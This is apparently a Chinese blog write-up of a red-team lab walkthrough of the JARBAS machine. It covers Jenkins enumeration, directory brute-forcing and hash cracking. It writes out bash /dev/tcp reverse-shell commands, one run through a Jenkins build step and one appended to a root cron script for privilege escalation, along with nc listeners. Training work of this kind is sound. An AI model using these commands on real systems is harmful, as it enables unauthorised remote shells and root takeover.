JARBAS - Jenkins渗透原理详解
「红队笔记」靶机精讲:JARBAS - Jenkins渗透原理详解,一个典型CMS渗透测试样本
基础思路
逐步扫描端口(上一集有讲)
发现8080登录端口
- 密码爆破
- 查找默认密码
- 猜弱密码
- 80端口浏览、目录爆破(信息泄露)
目录爆破
sudo dirb http://10.10.10.21sudo gobuster dir -u [url] -w [dict] (-x html,php)指定扩展名dirsearch
弹幕: 这里使用的字典要安装feroxbusterMD5Reverse
hash-identfier 工具识别(密码喷射[1])
常用网站 - hashes.com
- crackstation.net
ExecuteShell
登录后遇见Build Environment, 可以执行反弹Shell/bin/bash -i >& /dev/tcp/10.10.10.3/4444 0>&1
在kali开启监听sudo nc -lvnp 4444
Jenkins里点击Build Now。尝试获得反弹Shell
查看获得的Shell状态
whoamiuname -a 查看系统ip a或ifconfig查看发现无效
dpkg -l 无效
思路:提权在初步的枚举上遇见较大障碍,只能看系统有哪些权限
sudo -l 查看当前用户有哪些权限
cat /etc/passwd 查看当前系统有哪些用户
ps. 最后一个引号后有/bin/bash代表用户被分配了bash
弹幕:查到jenkins是一个ci系统以后就应该想到这里会有自定义构建命令的空子可以利用
弹幕:不止是pyhton,根据靶机实际情况可以创造不同的反弹shell,可以去详细了解一下,也有相关的反弹shell生成网站
其他提权尝试
- 查看定时任务
cat /etc/crontab
cat /etc/cron.d
该靶机发现root /etc/script/CleaningScript.sh >/dev/null 2>&1
cat /etc/script/CleaningScript.sh
echo “/bin/bash -i >& /dev/tcp/10.10.10.3/4443 0>&1” >> /etc/script/CleaningScript.sh
追加到脚本里,使用其他端口,提前执行以下命令开启监听
sudo nc -lvnp 4443
ps. 对于clear没反应的终端,可以输入 export TERM=xterm,就可以clear了
JARBAS - Jenkins渗透原理详解
https://blog.zhaosn.top/2025/JARBAS/